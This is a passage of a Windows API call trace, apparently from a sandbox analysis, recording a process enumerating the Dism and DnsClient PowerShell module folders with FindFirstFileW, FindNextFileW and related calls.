ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.166] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6291, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.166] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psd1", cAlternateFileName="")) returned 1 [0226.166] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psm1", cAlternateFileName="")) returned 1 [0226.166] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.166] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0226.167] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 1 [0226.167] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 0 [0226.167] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.167] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0226.167] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38 [0226.167] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.168] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.168] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6291, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.168] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psd1", cAlternateFileName="")) returned 1 [0226.168] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psm1", cAlternateFileName="")) returned 1 [0226.169] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.169] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0226.169] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 1 [0226.169] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.169] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.169] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0226.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.170] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.170] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0226.170] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38 [0226.170] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.170] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.170] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6291, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.171] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psd1", cAlternateFileName="")) returned 1 [0226.171] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psm1", cAlternateFileName="")) returned 1 [0226.171] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.171] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0226.171] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 1 [0226.171] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 0 [0226.171] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.172] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1")) returned 0x20 [0226.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.172] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0226.172] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d [0226.172] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf970 [0226.173] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.173] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0226.173] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.173] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.173] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.173] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.174] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.174] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.174] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0226.174] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0226.174] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0226.174] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0226.175] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, 